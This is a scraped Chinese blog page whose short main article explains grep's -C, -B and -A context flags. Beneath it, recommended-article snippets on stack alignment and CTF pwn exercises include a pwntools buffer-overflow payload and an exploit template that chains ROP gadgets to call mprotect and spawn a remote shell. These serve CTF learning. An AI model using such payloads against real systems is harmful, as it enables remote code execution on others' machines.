linux grep 显示前后几行

最新推荐文章于 2025-03-20 08:59:09 发布
最新推荐文章于 2025-03-20 08:59:09 发布
阅读量457 收藏
点赞数
文章标签: shell c/c++
原文链接:https://yq.aliyun.com/articles/682299
版权
本文深入探讨了grep命令的高级用法,包括如何使用-grep-C参数来在匹配行的上下文中显示额外的行数,这对于理解代码上下文或文本片段非常有帮助。通过实例讲解,读者将学会更高效地利用grep进行文本搜索。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

grep -C 5 foo file 前后
grep -B 5 foo file before
grep -A 5 foo file after

上的内存对齐
hekailing的专栏
11-11 1270
C++ Primer Plus第四章10节第一个程序清单(4.24 choices.cpp)
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4835
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
cortex-m3 的8字节对齐
weixin_30249203的博客
06-27 454
一、什么是对齐的字节对齐,实际是指顶指针须是某字节的整数倍。因此下边对系统与MSP,任务与PSP,对齐与SP对齐 这三对概念不做区分。另外下文提到编译器的时候,实际上是对编译器汇编器连接器的统称。 之前对的8字节对齐理解的不透,就在网上查了好多有关字节对齐、还有一些ARM对齐伪指令的资料信息,又做了一些实验,把这些零碎的信息拼接在一起,总觉得理解透这个问题的话得长篇大论了。...
何为对齐 Pwn
最新发布
m0_68956519的博客
03-20 413
在平常做题时总是发现直接call后门函数会EOF。后面看wp中提到了对齐这个概念,现在就来看看怎么回事例题一个很简单的溢出+后门函数题但如果你直接call后门函数的话会直接EOF所以这是为什么呢这里先介绍一个经常出现于程序中搬运浮点数的指令MOVAPSMOVAPS是 x86 汇编语言中的一条指令,用于在 SIMD(单指令多数据)操作中移动数据。具体来说,MOVAPS。
Pwn中,为什么时长需要对齐
红叶的博客
12-07 1708
Pwn 的学习中,对于初学者常常会遇到这个问题:找到了溢出点,并且知道如何溢出,但是不知道为什么自己的Payload并没有成功,Pwntools报错EOF:今天趁着有时间,来仔细研究一下为什么会发生这种情况。
数据结构对齐对齐 对齐
weixin_30268921的博客
09-24 561
good:https://hps.vi4io.org/_media/teaching/wintersemester_2013_2014/epc-14-haase-svenhendrik-alignmentinc-presentation.pdf 本节疑惑的原因:在读Hotspot源码时: https://bugs.openjdk.java.net/bro...
ROP 中的对齐
blog
12-17 749
在 ROP(Return-Oriented Programming)的上下文中,维护对齐变得尤为重要,因为 ROP 链依赖于连续的函数返回指令(以及其他 gadgets)来执行预期的逻辑。如果对齐不正确,可能会导致 ROP 链中断或无法按预期执行,甚至可能引发异常或错误行为。因此,ROP 链的设计者需要精心挑选和排列 gadgets,以确保在每次操作后仍然对齐,这增加了 ROP 攻击的难度和复杂性。
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4666
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
一道堆方向的pwn(堆溢出、堆拼接)
F_Day_的博客
10-18 2066
一道堆方向的pwn(堆溢出、堆拼接) 这道题是17年0ctf的一道题,从里面还是能学到许多东西的 babyheap 这里我就直接记录我的做题过程 在此之前,查看保护信息,发现保护全开,emmmm Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 代码分析 先来看看伪代码 main函数就不做
PWN入门学习
qq_20254219的博客
10-20 2863
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
CTFshow-PWN入门-溢出38-40详解 持续更新
王慕杨。的博客
09-06 935
本来是不想写的,但是想想还是写一下吧,基础知识这些就先不写了,以后有时间再补上吧,比较懒前面的有时间再写吧 主要是做过了。。懒。
内存对齐 详细介绍内存对齐的原理
11-17
关于内存对齐的很详细的解析.内容有什么是内存对齐,为什么需要内存对齐,编译器对内存对齐的处理,内存对齐等,并附有验证代码.值得一看.
内存对齐详解
weixin_34326558的博客
01-08 253
内存对齐,memory alignment.为了提高程序的性能,数据结构(尤其是)应该尽可能地在自然边界上对齐。原因在于,为了访问未对齐内存,处理器需要作两次内存访问;然而,对齐内存访问仅需要一次访问。内存对齐一般讲就是cpu access memory的效率(提高运行速度)和准确性(在一些条件下,如果没有对齐会导致数据不同步现象).依赖cpu,平台和编译器的不同.一些cpu要求较高(这句话...
x86_64 Linux 运行时的字节对齐
weixin_30670151的博客
08-11 682
前言 C语言的过程调用机制(即函数之间的调用)的一个关键特性(起始大多数编程语言也是如此)都是使用了数据结构提供的后进先出的内存管理原则。每一个函数的空间被称为帧,一个帧上包含了保存的寄存器、分配给局部变量的空间以及传递给要调用函数的参数等等。一个基本的结构如下图所示: 但是,有一点需要引起注意的是,过程调用的参数是通过来传递的,并且分配的局部变量也在上,那么对于不同字节...
【嵌入式】堆栈8字节对齐
AsCoolCucmber的博客
12-14 2030
本文转载于: https://www.cnblogs.com/sky1991/archive/2012/10/13/2722482.html 并且自己稍微做了修改 一、为什么要保证堆栈8字节对齐 AAPCS规则要求堆栈保持8字节对齐。 如果不对齐,调用一般的函数也是没问题的。但是当调用需要严格遵守AAPCS规则的函数时可能会出错。 例如调用sprintf输出一个浮点数时,必须是8字节对齐的,否则...
二分,和队列,结构体内存对齐
qq_62995672的博客
02-13 547
1.二分查找 二分查找也叫折半查找,是一种快速搜索的算法,对于一组有序数字进行快速搜索,在较短的时间内得出结果。 思路: 1.首先从数据的中间元素与所要查找的元素进行比较,如果该元素是所查找的元素,则结束程序,否则执行第二步操作 2.如果所查找的元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤1的操作。 3.如果某一步的数据为空则找不到该元素 例题 题目描述 输入n(n\le10^6)n(n≤106)个不超过10^9109的单调不减的(就是后面的数...
关于ubuntu18版本以上调用64位程序中的system函数的对齐问题
weixin_53394081的博客
03-06 537
对齐 最近在使用ubuntu做64位的pwn题时遇到了一些问题,由于自己刚入门不久,不能及时发现问题,后来在师傅指点下才知道遇到了64位中的对齐问题,具体看以下博客 https://www.cnblogs.com/ZIKH26/articles/15996874.html 注意要找ret,加到rop链中,覆盖ret地址就行,说垃圾数据后面也对 ROPgadget使用 https://blog.csdn.net/weixin_45556441/article/details/114631043
buuctf DSACTF7月pwn 迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1721
文章目录actf_2019_babystack actf_2019_babystack 迁移,注意ret对齐对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
关于对齐(stack alignment)
天高云淡
11-22 6351
手册上介绍:The stack pointer for a stack segment should be aligned on 16-bit (word) or 32-bit (double-word)boundaries, depending on the width of the stack segment. The D flag in the segment descriptorfor the current code segment sets the stack-segment width (re
pwn mprotect
01-17
### 关于 `mprotect` 函数的用法 在C标准库中,`mprotect` 是一个系统调用,允许改变内存保护属性。对于给定地址范围内的页面,该函数能够设置读、写或执行权限。这在处理动态加载代码或是修改现有代码段时非常有用[^1]。 ```c #include <sys/mman.h> int mprotect(void *addr, size_t len, int prot); ``` 参数说明如下: - `addr`: 起始地址,通常需要按页对齐。 - `len`: 需要更改权限的字节数量。 - `prot`: 新的访问权限标志,比如 PROT_READ | PROT_WRITE 或者加上PROT_EXEC 表示可执行。 当涉及到安全挑战特别是CTF比赛里的PWN题目时,如果二进制文件是以静态方式编译链接,则其中必然存在此API实现。 ### 利用技巧实例展示 假设有一个简单的缓冲区溢出漏洞存在于某个服务端应用之中,并且目标机器上的ASLR(Address Space Layout Randomization)已经被禁用了。此时可以通过覆盖返回指针指向一段自定义shellcode的位置前先调整其所在区域为RWX模式以便成功触发远程命令执行。 具体操作流程如下所示: 1. 找到合适的gadget链来调用`mprotect()`使堆栈成为可执行状态; 2. 构造payload将上述找到的第一个gadget地址作为新的EIP/RIP值; 3. 后续跟随必要的参数传递以及最终想要运行的有效载荷(shellcode); 这里给出一个简化版的例子用来解释概念而非实际可用的exploit: ```python from pwn import * # 假设已知的信息 binary_base_addr = 0x400000 # 可执行文件基址 stack_start = 0x7ffffffde000 # 起始位置 size = 0x1000 # 修改一页大小 new_perms = 0x7 # rwx 权限 pop_rdi_ret_gadget= binary_base_addr + offset_to_poprdi # pop rdi; ret; pop_rsi_ret_gadget= binary_base_addr + offset_to_poprsi # pop rsi; ret; pop_rdx_ret_gadget= binary_base_addr + offset_to_poprdx # pop rdx; ret; # 连接至远端服务器并发送Payload conn = remote('target', port) payload = b'A'*(offset_to_return_address) payload += p64(pop_rdi_ret_gadget) # 设置第一个参数 addr payload += p64(stack_start) payload += p64(pop_rsi_ret_gadget) # 设置第二个参数 length payload += p64(size) payload += p64(pop_rdx_ret_gadget) # 设置第三个参数 protection flags payload += p64(new_perms) payload += p64(binary_base_addr+mprotect_offset_from_plt) # 调用mprotect() payload += shellcraft.sh() # 插入shellcode conn.sendline(payload) conn.interactive() ``` 这段Python脚本使用pwntools框架构建了一个针对特定条件下的攻击向量。它首先填充足够的字符直到覆盖掉返回地址,接着依次放置几个ROP gadgets以准备调用`mprotect()`所需的三个实参,最后附加了一条创建交互式shell的指令序列。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值